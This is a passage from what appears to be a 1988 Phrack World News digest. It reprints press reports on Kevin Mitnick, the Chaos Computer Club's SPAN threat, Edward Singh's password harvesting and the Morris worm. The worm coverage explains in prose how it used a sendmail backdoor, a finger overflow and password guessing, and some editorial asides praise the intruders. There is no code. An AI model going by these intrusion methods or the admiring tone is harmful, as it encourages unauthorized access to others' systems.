  3744. calls from jail, fearing he might gain access to a computer over the phone
  3745. lines.
  3746.  
  3747. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3748.  
  3749. Dangerous Keyboard Artist                                     December 20, 1988
  3750. ~~~~~~~~~~~~~~~~~~~~~~~~~
  3751. LOS ANGELES (UPI) - In a rare ruling, a convicted computer hacker was ordered
  3752. held without bail Thursday on new charges that he gained illegal access to
  3753. secret computer information of Leeds University in England and Digital
  3754. Equipment Corportation.
  3755.  
  3756. Kevin David Mitnick, age 25, of Panorama City, is named in two separate
  3757. criminal complaints charging him with computer fraud.  Assistant United States
  3758. Attorney, Leon Weidman said it is unusual to seek detention in such cases, but
  3759. he considers Mitnick 'very very dangerous' and someone who 'needs to be kept
  3760. away from computers.'
  3761.  
  3762. United States Magistrate Venetta Tasnuopulos granted the no-bail order after
  3763. Weidman told her that since 1982, Mitnick had also accessed the internal
  3764. records of the Los Angeles Police Department, TRW Corporation, and Pacific
  3765. Telephone.
  3766.  
  3767. "He could call up and get access to the whole world," Weidman said.
  3768.  
  3769. Weidman said Mitnick had served six months in juvenile hall for stealing
  3770. computer manuals from a Pacific Telephone office in the San Fernando Valley
  3771. and using a pay phone to destroy $200,000 worth of data in the files of a
  3772. northern California company.
  3773.  
  3774. Mitnick later pentrated the files of TRW Corporation and altered the credit
  3775. information of several people, including his probation officer, Weidman said.
  3776.  
  3777. He said Mitnick also used a ruse to obtain the name of the police detective
  3778. investigating him for hacking when he was a student at Pierce College.  He
  3779. telephoned the dean at 3 a.m., identified himself as a campus security guard,
  3780. reported a computer burglary in progress and asked for the name of the
  3781. detective investigating past episodes, Weidman said.
  3782.  
  3783. The prosecutor said Mitnick also gained access to the police department's
  3784. computer data and has impersonated police officers and judges to gain
  3785. information.
  3786.  
  3787. A complaint issued charges Mitnick with using a computer in suburban Calabases
  3788. to gain access to Leeds University computer data in England.  He also allegedly
  3789. altered long-distance phone costs incurred by that activity in order to cover
  3790. his mischief.
  3791.  
  3792. A second complaint charges Mitnick with stealing proprietary Digital Equipment
  3793. Corporation software valued at more than $1 million and designed to protect the
  3794. security of its computer data.  Mitnick alledgedly stored the stolen data in a
  3795. University of Southern California computer.
  3796.  
  3797. An affidavit filed to support the complaints said unauthorized intrusions into
  3798. the Digital computer have cost the company more than $4 million in computer
  3799. downtime, file rebuilding, and lost employee worktime.
  3800.  
  3801. A computer operator at Voluntary Plan Assistance in Calabasas, which handles
  3802. disability claims for private firms, told investigators he allowed his friend
  3803. unauthorized access to the firm's computer.  From that terminal, Mitnick gained
  3804. access to Digital's facilities in the United States and abroad, the affidavit
  3805. said.
  3806.  
  3807. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3808. Kevin Mitnick's fate is in the hand's of the court now, but only time will tell
  3809. what is to happen to this dangerously awesome computer hacker.
  3810. _______________________________________________________________________________
  3811.  
  3812. Trojan Horse Threat Succeeds                                  February 10, 1988
  3813. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3814. During the week prior to February 10, 1988, the Chaos Computer Club of West
  3815. Berlin announced that they were going to trigger trojan horses they'd
  3816. previously planted on various computers in the Space Physics Analysis Network
  3817. (SPAN).  Presumably, the reason for triggering the trojan horses was to throw
  3818. the network into disarray; if so, the threat did, unfortunately, with the help
  3819. of numerous fifth-columnists within SPAN, succeeded.  Before anybody within
  3820. SPAN replies by saying something to the effect of "Nonsense, they didn't
  3821. succeed in triggering any trojan horses."  However the THREAT succeeded.
  3822.  
  3823. That's right, for the last week SPAN hasn't been functioning very well as a
  3824. network.  All too many of the machines in it have cut off network
  3825. communications (or at least lost much of their connectivity), specifically in
  3826. order to avoid the possibility that the trojan horses would be triggered (the
  3827. fifth-columnists who were referred above are those system and network managers
  3828. who were thrown into panic by the threat).  This is rather amazing (not to
  3829. mention appalling) for a number of reasons:
  3830.  
  3831.     1)  By reducing networking activities, SPAN demonstrated that the CCC DOES
  3832.         have the power to disrupt the network (even if there aren't really any
  3833.         trojan horses out there);
  3834.     2)  Since the break-ins that would have permitted the installation of
  3835.         trojan horses, there have been a VMS release (v4.6) that entails
  3836.         replacement of ALL DEC-supplied images.  Installation of the new
  3837.         version of VMS provided a perfect opportunity to purge one's system of
  3838.         any trojan horses.
  3839.     3)  In addition to giving CCC's claims credibility, SPAN's response to the
  3840.         threat seems a bit foolish since it leaves open the question "What
  3841.         happens if the CCC activates trojan horses without first holding a
  3842.         press conference?"
  3843.  
  3844. Hiding from the problem doesn't help in any way, it merely makes SPAN (and
  3845. NASA) look foolish.
  3846.  
  3847.                             Information Provided By
  3848.                      Carl J. Ludick and Frederick M. Korz
  3849.  
  3850. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3851.  
  3852. This is a perfect example of a self-fulfilling phrophecy.  The Chaos Computer
  3853. Club's announcement that they were going to trigger their Trojan horses in the
  3854. Space Physics Analysis Network (SPAN) illustrates the potent power of rumor --
  3855. backed by plausibility.  They didn't have to do anything.  The sky didn't have
  3856. to fall.  Nervous managers did the damage for the CCC because they felt the
  3857. announcement/threat plausible.  The prophecy was fulfilled.
  3858.  
  3859.                        "And the more the power to them!"
  3860.  
  3861. :Knight Lightning
  3862. _______________________________________________________________________________
  3863.  
  3864. TCA Pushes For Privacy On Corporate Networks                   October 19, 1988
  3865. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3866. By Kathy Chin Leong  (Computerworld Magazine)
  3867.  
  3868. SAN DIEGO -- As more and more confidential data winds its way across computer
  3869. networks, users are expressing alarm over how much of that information is safe
  3870. from subsidiaries of the Bell operating companies (BOCs) and long-distance
  3871. firms providing transmission services.
  3872.  
  3873. This fear has prompted the Tele-Communications Association (TCA) and large
  3874. network users to appeal to the Federal Communications Commission to clarify
  3875. exactly what network data is available to these vendors.
  3876.  
  3877. Users with large networks, such as banks and insurance companies, are concerned
  3878. that published details even of where a circuit is routed can be misused.  "We
  3879. don't what someone like AT&T to use our information and then turn around and
  3880. compete against us," said Leland Fong, a network planner at Visa International
  3881. in San Francisco.  Users are demanding that the FCC establish a set of rules
  3882. and regulations so that information is not abused.
  3883.  
  3884. At issue is the term "customer proprietary network information" (CPNI), which
  3885. encompasses packet data, address and circuit information and traffic statistics
  3886. on networks.  Under the FCC's Computer Inquiry III rules, long-distance
  3887. carriers and Bell operating companies --- specifically, marketing personnel ---
  3888. can get access to their own customers' CPNI unless users request
  3889. confidentiality.  What his group wants, TCA President Jerry Appleby said, is
  3890. the FCC to clarify exactly what falls under the category of CPNI.
  3891.  
  3892. Fong added that users can be at the mercy of the Bell operating companies and
  3893. long-distance vendors if there are no safeguards established.  Customer
  3894. information such as calling patterns can be used by the operating companies for
  3895. thier own competitive advantage.  "At this time, there are no controls over
  3896. CPNI, and the users need to see some action on this," Fong said.
  3897.  
  3898.                               Spread The Concern
  3899.  
  3900. At a meeting here during the TCA show, TCA officials and the association's
  3901. government liason committee met with AT&T to discuss the issue; the group will
  3902. also voice its concerns to other vendors.
  3903.  
  3904. Appleby said the issue should not be of concern just to network managers but to
  3905. the entire company.  Earlier this month, several banks, including Chase
  3906. Manhattan Bank and Security Pacific National Bank, and credit card companies
  3907. met with the FCC to urge it to come up with a standard definition for CPNI,
  3908. Appleby said.
  3909.  
  3910. While the customer information is generally confidential, it is available to
  3911. the transmission carrier that is supplying the line.  The data is also
  3912. available to marketing departments of that vendor unless a company asks for
  3913. confidentiality.  Fong said that there is no regulation that prevents a company
  3914. from passing the data along to its subsidiaries.
  3915. _______________________________________________________________________________
  3916.  
  3917. Belgian Leader's Mail Reportedly Read By Hacker                October 22, 1988
  3918. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3919. Taken from the Los Angeles Times
  3920.  
  3921. Brussels (AP) -- Belgian Prime Minister Wilfried Martens on Friday ordered an
  3922. investigation into reports that a computer hacker rummaged through his
  3923. electronic files and those of other Cabinet members.
  3924.  
  3925. The newspaper De Standaard reported that a man, using a personal computer, for
  3926. three months viewed Martens' electronic mail and other items, including
  3927. classified information about the killing of a British soldier by the Irish
  3928. Republican Army in Ostend in August.
  3929.  
  3930. The newspaper said the man showed one of its reporters this week how he broke
  3931. into the computer, using Martens' password code of nine letters, ciphers and
  3932. punctuation marks.  "What is more, during the demonstration, he ran into
  3933. another 'burglar' ... with whom he briefly conversed" via computer, the
  3934. newspaper said.
  3935. _______________________________________________________________________________
  3936.  
  3937. Police Find Hacker Who Broke Into 200 Computers                October 24, 1988
  3938. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3939. London (New York Times) - Police said yesterday that they had found and
  3940. questioned a 23-year-old man who used computer networks to break into more than
  3941. 200 military, corporate, and university systems in Europe and the United States
  3942. during the past five years.
  3943.  
  3944. The man was asked about an alleged attempt to blackmail a computer
  3945. manufacturer, but an official for Scotland Yard said that there was not enough
  3946. evidence to pursue the matter.  He was released.
  3947.  
  3948. The man, Edward Austin Singh, who is unemployed, reportedly told the police he
  3949. had been in contact with other computer "hackers" in the United States and West
  3950. Germany who use communications networks to penetrate the security protecting
  3951. computers at military installations.
  3952.  
  3953. Singh's motive was simply to prove that it was possible to break into the
  3954. military systems, police said, and apparently he did not attempt espionage.
  3955.  
  3956. London police began an investigation after the man approached a computer
  3957. manufacturer.  He allegedly asked the company for $5250 in exchange for telling
  3958. it how he had entered its computer network.
  3959.  
  3960. The company paid nothing, and London police tracked the suspect by monitoring
  3961. his phone calls after the firm had told Scotland Yard about the incident.
  3962.  
  3963. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3964.  
  3965. University of Surrey Hacker                                   November 10, 1988
  3966. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3967. There has been a lot of recent publicity in the U.K. about the arrest of a
  3968. hacker at the University of Surrey.  There were stories about his investigation
  3969. by Scotland Yard's Serious Crimes Squad and by the U.S. Secret Service, and
  3970. much dicussion about the inadequacy of the law relating to network hacking.  At
  3971. this date, he has only been charged with offences relating his unathorised
  3972. (physical) entry to the University buildings.
  3973.  
  3974. An interview with the individual, Edward Austin Singh, reveals that his
  3975. techniques were simply ased on a program which tricked users into
  3976. unsuspectingly revealing their passwords.  "I wrote a program that utilized a
  3977. flaw that allowed me to call into the dial-up node.  I always did it by
  3978. phoning, never by the network.  The dial-up node has to have an address as
  3979. well, so I was calling the address itself.  I called the dial-up node via the
  3980. network and did it repeatedly until it connected.  That happened every 30
  3981. seconds.  It allowed me to connect the dial-up node at the same time as a
  3982. legitimate user at random.  I would then emulate the system."
  3983.  
  3984. He used to run this program at night, and specialized in breaking into Prime
  3985. computer systems.  "I picked up about 40 passwords and IDs an hour.  We were
  3986. picking up military stuff like that, as well as commercial and academic," he
  3987. claims.  This enabled him to get information from more than 250 systems
  3988. world-wide, and (he claims) in touich with an underground hackers network to
  3989. "access virtually every single computer system which was networked in the US -
  3990. thousands and thousands of them, many of them US Arms manufacturers."
  3991.  
  3992. The article states that "Prime Computers have so far declined to comment on his
  3993. approach to them or his alleged penetration of their computer systems, until
  3994. the American Secret Service completes its inquiries."
  3995.  
  3996.                      Information Provided By Brian Randell
  3997. _______________________________________________________________________________
  3998. =========================================================================
  3999.  
  4000.                                 ==Phrack Inc.==
  4001.  
  4002.                      Volume Two, Issue 22, File 10 of 12
  4003.  
  4004.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4005.             PWN                                                 PWN
  4006.             PWN        P h r a c k   W o r l d   N e w s        PWN
  4007.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  4008.             PWN                Issue XXII/Part 2                PWN
  4009.             PWN                                                 PWN
  4010.             PWN           Created by Knight Lightning           PWN
  4011.             PWN                                                 PWN
  4012.             PWN              Written and Edited by              PWN
  4013.             PWN         Knight Lightning and Taran King         PWN
  4014.             PWN                                                 PWN
  4015.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4016.  
  4017.  
  4018. Computer Network Disrupted By "Virus"                          November 3, 1988
  4019. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4020. By John Markoff  (New York Times)
  4021.  
  4022. In an intrusion that raises new questions about the vulnerability of the
  4023. nation's computers, a nationwide Department of Defense data network has been
  4024. disrupted since Wednesday night by a rapidly spreading "virus" software program
  4025. apparently introduced by a computer science student's malicious experiment.
  4026.  
  4027. The program reproduced itself through the computer network, making hundreds of
  4028. copies in each machine it reached, effectively clogging systems linking
  4029. thousands of military, corporate and university computers around the country
  4030. and preventing them from doing additional work.  The virus is thought not to
  4031. have destroyed any files.
  4032.  
  4033. By late Thursday afternoon computer security experts were calling the virus the
  4034. largest assault ever on the nation's computers.
  4035.  
  4036. "The big issue is that a relatively benign software program can virtually bring
  4037. our computing community to its knees and keep it there for some time," said
  4038. Chuck Cole, deputy computer security manager at Lawerence Livermore Laboratory
  4039. in Livermore, Calif., one of the sites affected by the intrusion.  "The cost is
  4040. going to be staggering."
  4041.  
  4042. Clifford Stoll, a computer security expert at Harvard University, added, "There
  4043. is not one system manager who is not tearing his hair out.  It's causing
  4044. enormous headaches."
  4045.  
  4046. The affected computers carry routine communications among military officials,
  4047. researchers and corporations.
  4048.  
  4049. While some sensitive military data are involved, the nation's most sensitive
  4050. secret information, such as that on the control of nuclear weapons, is thought
  4051. not to have been touched by the virus.
  4052.  
  4053. Computer viruses are so named because they parallel in the computer world the
  4054. behavior of biological viruses.  A virus is a program, or a set of instructions
  4055. to a computer, that is deliberately planted on a floppy disk meant to be used
  4056. with the computer or introduced when the computer is communicating over
  4057. telephone lines or data networks with other computers.
  4058.  
  4059. The programs can copy themselves into the computer's master software, or
  4060. operating system, usually without calling any attention to themselves. From
  4061. there, the program can be passed to additional computers.
  4062.  
  4063. Depending upon the intent of the software's creator, the program might cause a
  4064. provocative but otherwise harmless message to appear on the computer's screen.
  4065. Or it could systematically destroy data in the computer's memory.
  4066.  
  4067. The virus program was apparently the result of an experiment by a computer
  4068. science graduate student trying to sneak what he thought was a harmless virus
  4069. into the Arpanet computer network, which is used by universities, military
  4070. contractors and the Pentagon, where the software program would remain
  4071. undetected.
  4072.  
  4073. A man who said he was an associate of the student said in a telephone call to
  4074. The New York Times that the experiment went awry because of a small programming
  4075. mistake that caused the virus to multiply around the military network hundreds
  4076. of times faster than had been planned.
  4077.  
  4078. The caller, who refused to identify himself or the programmer, said the student
  4079. realized his error shortly after letting the program loose and that he was now
  4080. terrified of the consequences.
  4081.  
  4082. A spokesman at the Pentagon's Defense Communications Agency, which has set up
  4083. an emergency center to deal with the problem, said the caller's story was a
  4084. "plausible explanation of the events."
  4085.  
  4086. As the virus spread Wednesday night, computer experts began a huge struggle to
  4087. eradicate the invader.
  4088.  
  4089. A spokesman for the Defense Communications Agency in Washington acknowledged
  4090. the attack, saying, "A virus has been identified in several host computers
  4091. attached to the Arpanet and the unclassified portion of the defense data
  4092. network known as the Milnet."
  4093.  
  4094. He said that corrections to the security flaws exploited by the virus are now
  4095. being developed.
  4096.  
  4097. The Arpanet data communications network was established in 1969 and is designed
  4098. to permit computer researchers to share electronic messages, programs and data
  4099. such as project information, budget projections and research results.
  4100.  
  4101. In 1983 the network was split and the second network, called Milnet, was
  4102. reserved for higher-security military communications.  But Milnet is thought
  4103. not to handle the most classified military information, including data related
  4104. to the control of nuclear weapons.
  4105.  
  4106. The Arpanet and Milnet networks are connected to hundreds of civilian networks
  4107. that link computers around the globe.
  4108.  
  4109. There were reports of the virus at hundreds of locations on both coasts,
  4110. including, on the East Coast, computers at the Massachusetts Institute of
  4111. Technology, Harvard University, the Naval Research Laboratory in Maryland and
  4112. the University of Maryland and, on the West Coast, NASA's Ames Research Center
  4113. in Mountain View, Calif.; Lawrence Livermore Laboratories; Stanford University;
  4114. SRI International in Menlo Park, Calif.; the University of California's
  4115. Berkeley and San Diego campuses and the Naval Ocean Systems Command in San
  4116. Diego.
  4117.  
  4118. A spokesman at the Naval Ocean Systems Command said that its computer systems
  4119. had been attacked Wednesday evening and that the virus had disabled many of the
  4120. systems by overloading them.  He said that computer programs at the facility
  4121. were still working on the problem more than 19 hours after the original
  4122. incident.
  4123.  
  4124. The unidentified caller said the Arpanet virus was intended simply to "live"
  4125. secretly in the Arpanet network by slowly copying itself from computer to
  4126. computer.  However, because the designer did not completely understand how the
  4127. network worked, it quickly copied itself thousands of times from machine to
  4128. machine.
  4129.  
  4130. Computer experts who disassembled the program said that it was written with
  4131. remarkable skill and that it exploited three security flaws in the Arpanet
  4132. network.  [No. Actually UNIX] The virus' design included a program designed to
  4133. steal passwords, then masquerade as a legitimate user to copy itself to a
  4134. remote machine.
  4135.  
  4136. Computer security experts said that the episode illustrated the vulnerability
  4137. of computer systems and that incidents like this could be expected to happen
  4138. repeatedly if awareness about computer security risks was not heightened.
  4139.  
  4140. "This was an accident waiting to happen; we deserved it," said Geoffrey
  4141. Goodfellow, president of Anterior Technology Inc. and an expert on computer
  4142. communications.
  4143.  
  4144. "We needed something like this to bring us to our senses.  We have not been
  4145. paying much attention to protecting ourselves."
  4146.  
  4147. Peter Neumann, a computer security expert at SRI International Inc. in Menlo
  4148. Park International, said, "Thus far the disasters we have known have been
  4149. relatively minor.  The potential for rather extraordinary destruction is rather
  4150. substantial."
  4151.  
  4152. "In most of the cases we know of, the damage has been immediately evident. But
  4153. if you contemplate the effects of hidden programs, you could have attacks going
  4154. on and you might never know it."
  4155. _______________________________________________________________________________
  4156.  
  4157. Virus Attack                                                   November 6, 1988
  4158. ~~~~~~~~~~~~
  4159. >From the Philadelphia Inquirer (Inquirer Wire Services)
  4160.  
  4161. ITHACA, N.Y. - A Cornell University graduate student whose father is a top
  4162. government computer-security expert is suspected of creating the "virus" that
  4163. slowed thousands of computers nationwide, school officials said yesterday.
  4164.  
  4165. The Ivy League university announced that it was investigating the computer
  4166. files of 23-year-old Robert T. Morris, Jr., as experts across the nation
  4167. assessed the unauthorized program that was injected Wednesday into a military
  4168. and university system, closing it for 24 hours.  The virus slowed an estimated
  4169. 6,000 computers by replicating itself and taking up memory space, but it is not
  4170. believed to have destroyed any data.
  4171.  
  4172. M. Stuart Lynn, Cornell vice president for information technologies, said
  4173. yesterday that Morris' files appeared to contain passwords giving him
  4174. unauthorized access to computers at Cornell and Stanford Universities.
  4175.  
  4176. "We also have discovered that Morris' account contains a list of passwords
  4177. substantially similar to those found in the virus," he said at a news
  4178. conference.
  4179.  
  4180. Although Morris "had passwords he certainly was not entitled to," Lynn
  4181. stressed, "we cannot conclude from the existence of those files that he was
  4182. responsible."
  4183.  
  4184. FBI spokesman Lane Betts said the agency was investigating whether any federal
  4185. laws were violated.
  4186.  
  4187. Morris, a first-year student in a doctoral computer-science program, has a
  4188. reputation as an expert computer hacker and is skilled enough to have written
  4189. the rogue program, Cornell instructor Dexter Kozen said.
  4190.  
  4191. When reached at his home yesterday in Arnold, Md., Robert T. Morris, Sr., chief
  4192. scientist at the National Computer Security Center in Bethesda, Md., would not
  4193. say where his son was or comment on the case.
  4194.  
  4195. The elder Morris has written widely on the security of the Unix operating
  4196. system, the target of the virus program.  He is widely known for writing a
  4197. program to decipher passwords, which give users access to computers.
  4198. _______________________________________________________________________________
  4199.  
  4200. New News From Hacker Attack On Philips France, 1987            November 7, 1988
  4201. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4202. A German TV magazine reported (last week) that the German hackers which
  4203. attacked, in summer 1987, several computer systems and networks (including
  4204. NASA, the SPANET, the CERN computers which are labeled "European hacker
  4205. center," as well as computers of Philips France and Thompson-Brandt/France) had
  4206. transferred design and construction plans of the MegaBit chip having been
  4207. developed in the Philips laboratories.  The only information available is that
  4208. detailed graphics are available to the reporters showing details of the MegaBit
  4209. design.
  4210.  
  4211. Evidently it is very difficult to prosecute this data theft since German law
  4212. does not apply to France based enterprises.  Moreover, the German law may
  4213. generally not be applicable since its prerequit may not be true that PHILIPS'
  4214. computer system has "special protection mechanisms."  Evidently, the system was
  4215. only be protected with UID and password, which may not be a sufficient
  4216. protection (and was not).
  4217.  
  4218. Evidently, the attackers had much more knowledge as well as instruments (e.g.
  4219. sophisticated graphic terminals and plotters, special software) than a "normal
  4220. hacker" has.  Speculations are that these hackers were spions rather than
  4221. hackers of the Chaos Computer Club (CCC) which was blamed for the attack.
  4222. Moreover, leading members of CCC one of whom was arrested for the attack,
  4223. evidently have not enough knowledge to work with such systems.
  4224.  
  4225.                             Information Provided By
  4226.                         Klaus Brunnstein, Hamburg, FRG
  4227. _______________________________________________________________________________
  4228.  
  4229. The Computer Jam:  How It Came About                           November 8, 1988
  4230. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4231. By John Markoff  (New York Times)
  4232.  
  4233. Computer scientists who have studied the rogue program that crashed through
  4234. many of the nation's computer networks last week say the invader actually
  4235. represents a new type of helpful software designed for computer networks.
  4236.  
  4237. The same class of software could be used to harness computers spread around the
  4238. world and put them to work simultaneously.
  4239.  
  4240. It could also diagnose malfunctions in a network, execute large computations on
  4241. many machines at once and act as a speedy messenger.
  4242.  
  4243. But it is this same capability that caused thousands of computers in
  4244. universities, military installations and corporate research centers to stall
  4245. and shut down the Defense Department's Arpanet system when an illicit version
  4246. of the program began interacting in an unexpected way.
  4247.  
  4248. "It is a very powerful tool for solving problems," said John F. Shoch, a
  4249. computer expert who has studied the programs.  "Like most tools it can be
  4250. misued, and I think we have an example here of someone who misused and abused
  4251. the tool."
  4252.  
  4253. The program, written as a "clever hack" by Robert Tappan Morris, a 23-year-old
  4254. Cornell University computer science graduate student, was originally meant to
  4255. be harmless.  It was supposed to copy itself from computer to computer via
  4256. Arpanet and merely hide itself in the computers.  The purpose?  Simply to prove
  4257. that it could be done.
  4258.  
  4259. But by a quirk, the program instead reproduced itself so frequently that the
  4260. computers on the network quickly became jammed.
  4261.  
  4262. Interviews with computer scientists who studied the network shutdown and with
  4263. friends of Morris have disclosed the manner in which the events unfolded.
  4264.  
  4265. The program was introduced last Wednesday evening at a computer in the
  4266. artificial intelligence laboratory at the Massachusetts Institute of
  4267. Technology.  Morris was seated at his terminal at Cornell in Ithaca, N.Y., but
  4268. he signed onto the machine at MIT.  Both his terminal and the MIT machine were
  4269. attached to Arpanet, a computer network that connects research centers,
  4270. universities and military bases.
  4271.  
  4272. Using a feature of Arpanet, called Sendmail, to exchange messages among
  4273. computer users, he inserted his rogue program.  It immediately exploited a
  4274. loophole in Sendmail at several computers on Arpanet.
  4275.  
  4276. Typically, Sendmail is used to transfer electronic messages from machine to
  4277. machine throughout the network, placing the messages in personal files.
  4278.  
  4279. However, the programmer who originally wrote Sendmail three years ago had left
  4280. a secret "backdoor" in the program to make it easier for his work.  It
  4281. permitted any program written in the computer language known as C to be mailed
  4282. like any other message.
  4283.  
  4284. So instead of a program being sent only to someone's personal files, it could
  4285. also be sent to a computer's internal control programs, which would start the
  4286. new program.  Only a small group of computer experts -- among them Morris --
  4287. knew of the backdoor.
  4288.  
  4289. As they dissected Morris's program later, computer experts found that it
  4290. elegantly exploited the Sendmail backdoor in several ways, copying itself from
  4291. computer to computer and tapping two additional security provisions to enter
  4292. new computers.
  4293.  
  4294. The invader first began its journey as a program written in the C language.
  4295. But it also included two "object" or "binary" files -- programs that could be
  4296. run directly on Sun Microsystems machines or Digital Equipment VAX computers
  4297. without any additional translation, making it even easier to infect a computer.
  4298.  
  4299. One of these binary files had the capability of guessing the passwords of users
  4300. on the newly infected computer.  This permits wider dispersion of the rogue
  4301. program.
  4302.  
  4303. To guess the password, the program first read the list of users on the target
  4304. computer and then systematically tried using their names, permutations of their
  4305. names or a list of commonly used passwords.  When successful in guessing one,
  4306. the program then signed on to the computer and used the privileges involved to
  4307. gain access to additonal computers in the Arpanet system.
  4308.  
  4309. Morris's program was also written to exploit another loophole.  A program on
  4310. Arpanet called Finger lets users on a remote computer know the last time that a
  4311. user on another network machine had signed on.  Because of a bug, or error, in
  4312. Finger, Morris was able to use the program as a crowbar to further pry his way
  4313. through computer security.
  4314.  
  4315. The defect in Finger, which was widely known, gives a user access to a
  4316. computer's central control programs if an excessively long message is sent to
  4317. Finger.  So by sending such a message, Morris's program gained access to these
  4318. control programs, thus allowing the further spread of the rogue.
  4319.  
  4320. The rogue program did other things as well.  For example, each copy frequently
  4321. signaled its location back through the network to a computer at the University
  4322. of California at Berkeley.  A friend of Morris said that this was intended to
  4323. fool computer researchers into thinking that the rogue had originated at
  4324. Berkeley.
  4325.  
  4326. The program contained another signaling mechanism that became its Achilles'
  4327. heel and led to its discovery.  It would signal a new computer to learn whether
  4328. it had been invaded.  If not, the program would copy itself into that computer.
  4329.  
  4330. But Morris reasoned that another expert could defeat his program by sending the
  4331. correct answering signal back to the rogue.  To parry this, Morris programmed
  4332. his invader so that once every 10 times it sent the query signal it would copy
  4333. itself into the new machine regardless of the answer.
  4334.  
  4335. The choice of 1 in 10 proved disastrous because it was far too frequent.  It
  4336. should have been one in 1,000 or even one in 10,000 for the invader to escape
  4337. detection.
  4338.  
  4339. But because the speed of communications on Arpanet is so fast, Morris's illicit
  4340. program echoed back and forth through the network in minutes, copying and
  4341. recopying itself hundreds or thousands of times on each machine, eventually
  4342. stalling the computers and then jamming the entire network.
  4343.  
  4344. After introducing his program Wednesday night, Morris left his terminal for an
  4345. hour.  When he returned, the nationwide jamming of Arpanet was well under way,
  4346. and he could immediately see the chaos he had started.  Within a few hours, it
  4347. was clear to computer system managers that something was seriously wrong with
  4348. Arpanet.
  4349.  
  4350. By Thursday morning, many knew what had happened, were busy ridding their
  4351. systems of the invader and were warning colleagues to unhook from the network.
  4352. They were also modifying Sendmail and making other changes to their internal
  4353. software to thwart another invader.
  4354.  
  4355. The software invader did not threaten all computers in the network.  It was
  4356. aimed only at the Sun and Digital Equipment computers running a version of the
  4357. Unix operating system written at the University of California at Berkeley.
  4358. Other Arpanet computers using different operating systems escaped.
  4359.  
  4360. These rogue programs have in the past been referred to as worms or, when they
  4361. are malicious, viruses. Computer science folklore has it that the first worms
  4362. written were deployed on the Arpanet in the early 1970s.
  4363.  
  4364. Researchers tell of a worm called "creeper," whose sole purpose was to copy
  4365. itself from machine to machine, much the way Morris's program did last week.
  4366. When it reached each new computer it would display the message:  "I'm the
  4367. creeper.  Catch me if you can!"
  4368.  
  4369. As legend has it, a second programmer wrote another worm program that was
  4370. designed to crawl through the Arpanet, killing creepers.
  4371.  
  4372. Several years later, computer researchers at the Xerox Corp.'s Palo Alto
  4373. Research Center developed more advanced worm programs.  Shoch and Jon Hupp
  4374. developed "town crier" worm programs that acted as messengers and "diagnostic"
  4375. worms that patrolled the network looking for malfunctioning computers.
  4376.  
  4377. They even described a "vampire" worm program.  It was designed to run very
  4378. complex programs late at night while the computer's human users slept.  When
  4379. the humans returned in the morning, the vampire program would go to sleep,
  4380. waiting to return to work the next evening.
  4381. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4382. Comments from Mark Eichin (SIPB Member & Project Athena "Watchmaker");
  4383.  
  4384. The following paragraph from Markoff's article comes from a telephone
  4385. conversation he had with me at the airport leaving the November 8, 1988 "virus
  4386. conference":
  4387.  
  4388.     "But Morris reasoned that another expert could defeat his program by
  4389.      sending the correct answering signal back to the rogue.  To parry
  4390.      this, Morris programmed his invader so that once every 10 times it
  4391.      sent the query signal it would copy itself into the new machine
  4392.      regardless of the answer.
  4393.  
  4394.      The choice of 1 in 10 proved disastrous because it was far too
  4395.      frequent.  It should have been one in 1,000 or even one in 10,000
  4396.      for the invader to escape detection."
  4397.  
  4398. However, it is incorrect (I did think Markoff had grasped my comments, perhaps
  4399. not).  The virus design seems to have been to reinfect with a 1 in 15 chance a
  4400. machine already infected.
  4401.  
  4402. The code was BACKWARD, so it reinfected with a *14* in 15 chance.  Changing the
  4403. denominator would have had no effect.
  4404. _______________________________________________________________________________
  4405.  
  4406. US Is Moving To Restrict Access To Facts About Computer Virus     Nov. 11, 1988
  4407. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4408. By John Markoff  (New York Times)
  4409.  
  4410. Government officials are moving to bar wider dissemination of information on
  4411. techniques used in a rogue software program that jammed more than 6,000
  4412. computers in a nationwide computer network last week.
  4413.  
  4414. Their action comes amid bitter debate among computer scientists.  One group of
  4415. experts believes wide publication of such information would permit computer
  4416. network experts to identify problems more quickly and to correct flaws in their
  4417. systems.  But others argue that such information is too potentially explosive
  4418. to be widely circulated.
  4419.  
  4420. Yesterday, officials at the National Computer Security Center, a division of
  4421. the National Security Agency (NSA), contacted researchers at Purdue University
  4422. in West Lafayette, Indiana, and asked them to remove information from campus
  4423. computers describing internal workings of the software program that jammed
  4424. computers around the nation on November 3, 1988.  (A spokesperson) said the
  4425. agency was concerned because it was not certain that all computer sites had
  4426. corrected the software problems that permitted the program to invade systems in
  4427. the first place.
  4428.  
  4429. Some computer security experts said they were concerned that techniques
  4430. developed in the program would be widely exploited by those trying to break
  4431. into computer systems.
  4432. _______________________________________________________________________________
  4433.  
  4434. FBI Studies Possible Charges In "Virus"                       November 12, 1988
  4435. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4436. >From the Los Angeles Times
  4437.  
  4438. WASHINGTON -- FBI Director William S. Sessions on Thursday added two more laws
  4439. that agents are scrutinizing to determine whether to seek charges against
  4440. Robert T. Morris Jr. for unleashing a computer "virus" that shut down or slowed
  4441. computers across the country last week.
  4442.  
  4443. One of the laws - malicious mischief involving government communication lines,
